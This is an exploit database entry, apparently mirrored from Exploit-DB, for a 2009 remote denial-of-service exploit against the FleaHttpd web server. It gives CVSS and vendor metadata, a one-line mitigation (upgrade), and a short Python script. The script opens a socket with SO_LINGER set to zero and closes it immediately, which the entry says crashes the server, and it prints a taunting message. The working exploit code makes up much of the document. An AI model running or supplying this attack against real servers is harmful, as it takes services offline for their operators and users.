FleaHttpd Remote Denial Of Service Exploit

vendor:

FleaHttpd

by:

condis

7.5

CVSS

HIGH

Denial of Service

399

CWE

Product Name: FleaHttpd

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux Debian

2009

FleaHttpd Remote Denial Of Service Exploit

FleaHttpd is a http daemon written from scratch in C. When working as a static file server, data show that under certain condition, fleahttpd's speed for static file retrieving can be three times faster than Apache2. This exploit uses a socket connection to send a packet to the server, which causes the server to crash.

Mitigation:

Upgrade to the latest version of FleaHttpd.

Source

Exploit-DB raw data:

#!/usr/bin/python

"""

FleaHttpd Remote Denial Of Service Exploit
by condis

"FleaHttpd is a http daemon written from scratch in C. When working as a 
static file server, data show that under certain condition, fleahttpd's 
speed for static file retrieving can be three times faster than Apache2"

project site (source): http://code.google.com/p/fleahttpd/source/browse/trunk/fleahttpd.c
Tested on: Linux Debian

Just 4 fun :x

"""

import sys, socket, struct

host = '127.0.0.1'
port = 80

try:
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
	sock.connect((host, port))
	sock.close()
	print "Phuck3d!"

except:
	print "whOoPs?!"